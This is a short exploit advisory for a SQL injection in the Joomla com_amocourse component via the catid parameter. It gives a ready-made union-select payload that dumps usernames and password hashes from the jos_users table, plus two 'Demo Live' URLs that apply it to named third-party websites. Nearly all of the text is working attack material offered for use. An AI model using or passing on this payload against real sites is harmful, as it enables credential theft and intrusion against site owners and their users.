++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Joomla Component com_amocourse (catid) SQL-injection Vulnerability ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ################################################### [+] Author : Chip D3 Bi0s [+] Email : chipdebios[alt+64]gmail.com [+] Greetz : d4n1ux + x_jeshua + eCORE + rayok3nt [+] Vulnerability : SQL injection ################################################### Example: http://localHost/path//index.php?option=com_amocourse&task=view&view=category&catid=n[SQL code] n = catid valid [SQL code] +union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users-- Demo Live (1) http://www.kaieden.com/joomla/index.php?option=com_amocourse&task=view&view=category&catid=29+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users-- Demo Live Mambo (2) http://www.tangotherapy.co.uk/index.php?option=com_amocourse&task=view&view=category&catid=29+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users-- +++++++++++++++++++++++++++++++++++++++ #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++